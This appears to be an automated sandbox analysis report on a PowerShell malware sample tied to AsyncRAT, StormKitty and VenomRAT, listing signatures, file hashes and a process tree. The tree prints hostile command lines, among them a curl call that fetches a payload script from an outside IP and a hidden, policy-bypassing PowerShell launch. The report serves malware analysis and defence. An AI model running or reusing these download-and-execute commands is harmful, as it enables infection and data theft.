Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2025 09:17

General

  • Target

    trwsfg.ps1

  • Size

    1KB

  • MD5

    87cb99ee4cbf9c8c190da786ff51cc5e

  • SHA1

    70fcc5113233216e878781682befcedddf85eda2

  • SHA256

    81c941402a1bcf018d8d965f700229b5815d03ba02ca9f2d1a22c8ace0476972

  • SHA512

    85200ea2189e6e860286b9d0637698a9cf6c03380030816202e3ed0554da39bf01300470a0345f7c05b297e04e4603c2f226618fae9422d833ba22b5a47bfe6d

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • VenomRAT 1 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trwsfg.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4496
        • C:\Windows\system32\curl.exe
          curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
          4⤵
            PID:2388
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5060
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ndpbeafa\ndpbeafa.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3628
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7407.tmp" "c:\Users\Admin\AppData\Local\Temp\ndpbeafa\CSC1AF6773628E64F6C89BB291477781AD3.TMP"
              5⤵
                PID:3016
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2356

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      • C:\Users\Admin\AppData\Local\Temp\RES7407.tmp

        Filesize

        1KB

        MD5

        03322f9261421207f5507d0cf3d99785

        SHA1

        6ef8a402d36926b588ccb0665a36a9e7a434f6e4

        SHA256

        67af96c279fc82d7966286ca50af582bea3c23b13ed51370234c080bf487437e

        SHA512

        f65cffe37485ecd928eef45b8fdd92bcafc9d2a72e9f0faa43244e87b6067dbe14322959d6e4e09c7ec53053c7e8fcf0f1acc805d70bcc7c8a88ad135305828e

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nahonaqi.wbk.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\ndpbeafa\ndpbeafa.dll

        Filesize

        9KB

        MD5

        ec4603337910cb34ed212cd54333a1db

        SHA1

        ab6b7854981c1e2de0ef444d2959c5b2dc6e9d3d

        SHA256

        b7873676b16a40a522ea5b35838084b51803675f003979a40d22f8a227f38fcc

        SHA512

        3880f5058ceca5011a2f493af35accf9ce923042f9d7c9c12faa72a1796af402756aaf529ba10f33bbb5c5781a0857f529985081e58d1b46a324b0991f7fd9d3

      • C:\Windows\Temp\Modules.bat

        Filesize

        3KB

        MD5

        bb445d197063475c8d78de4f0825753c

        SHA1

        158a8e3b278affe7c1185aad67683e4253cf53dd

        SHA256

        7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10

        SHA512

        173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307

      • \??\c:\Users\Admin\AppData\Local\Temp\ndpbeafa\CSC1AF6773628E64F6C89BB291477781AD3.TMP

        Filesize

        652B

        MD5

        0f0e84513e62cafea2d576229818f1a1

        SHA1

        e7ae3b3ee95e4c63e36fd862c32afee4b47bf3a5

        SHA256

        30b3b17300008d4fb31d01125438ff906b7152e027b35468d87090ebea8878ca

        SHA512

        fc7e4537e0674dce97db730ac4d2d191cb97fc60bf3ed657e8633be0b1031a9a80e590de74e603015eae4f559fecff2e1b6a08a8232e5a6cbc0e1daa43242c9d

      • \??\c:\Users\Admin\AppData\Local\Temp\ndpbeafa\ndpbeafa.0.cs

        Filesize

        10KB

        MD5

        b5c3a2d03ff4c721192716f326c77dea

        SHA1

        6b754fd988ca58865674b711aba76d3c6b2c5693

        SHA256

        ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac

        SHA512

        d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248

      • \??\c:\Users\Admin\AppData\Local\Temp\ndpbeafa\ndpbeafa.cmdline

        Filesize

        204B

        MD5

        6cb3336b958cba4e03eda5909f87909a

        SHA1

        5893b1d60550d8cbf80853b5582c5345b9f42339

        SHA256

        cd6ad486cb451f05cd8d3a0157f35bdb478a3cdf73b20d5463b22e45085245a5

        SHA512

        20f13cb7951435334d411805580efdcc26488b94f1217fb4857f31b651042d5d25e316c0e50c409cba37c7be691b21e5c8e289d6760db568205889daf4b9a54e

      • memory/1376-19-0x00007FF8FC720000-0x00007FF8FD1E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1376-1-0x000001AB65190000-0x000001AB651B2000-memory.dmp

        Filesize

        136KB

      • memory/1376-11-0x00007FF8FC720000-0x00007FF8FD1E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1376-12-0x00007FF8FC720000-0x00007FF8FD1E1000-memory.dmp

        Filesize

        10.8MB

      • memory/1376-0-0x00007FF8FC723000-0x00007FF8FC725000-memory.dmp

        Filesize

        8KB

      • memory/2356-52-0x0000000005D30000-0x0000000005DC2000-memory.dmp

        Filesize

        584KB

      • memory/2356-51-0x0000000005E40000-0x00000000063E4000-memory.dmp

        Filesize

        5.6MB

      • memory/2356-59-0x0000000007070000-0x00000000073C4000-memory.dmp

        Filesize

        3.3MB

      • memory/2356-58-0x0000000007040000-0x0000000007062000-memory.dmp

        Filesize

        136KB

      • memory/2356-57-0x00000000068B0000-0x0000000006916000-memory.dmp

        Filesize

        408KB

      • memory/2356-56-0x0000000006CF0000-0x0000000006D8C000-memory.dmp

        Filesize

        624KB

      • memory/2356-48-0x0000000000400000-0x0000000000704000-memory.dmp

        Filesize

        3.0MB

      • memory/2356-53-0x0000000005CB0000-0x0000000005CBA000-memory.dmp

        Filesize

        40KB

      • memory/5060-21-0x00007FF8FC720000-0x00007FF8FD1E1000-memory.dmp

        Filesize

        10.8MB

      • memory/5060-20-0x00007FF8FC720000-0x00007FF8FD1E1000-memory.dmp

        Filesize

        10.8MB

      • memory/5060-50-0x00007FF8FC720000-0x00007FF8FD1E1000-memory.dmp

        Filesize

        10.8MB

      • memory/5060-46-0x000001D740640000-0x000001D740648000-memory.dmp

        Filesize

        32KB

      • memory/5060-33-0x000001D726390000-0x000001D7263A0000-memory.dmp

        Filesize

        64KB

      • memory/5060-31-0x000001D740A20000-0x000001D740A64000-memory.dmp

        Filesize

        272KB

      • memory/5060-32-0x000001D740AF0000-0x000001D740B66000-memory.dmp

        Filesize

        472KB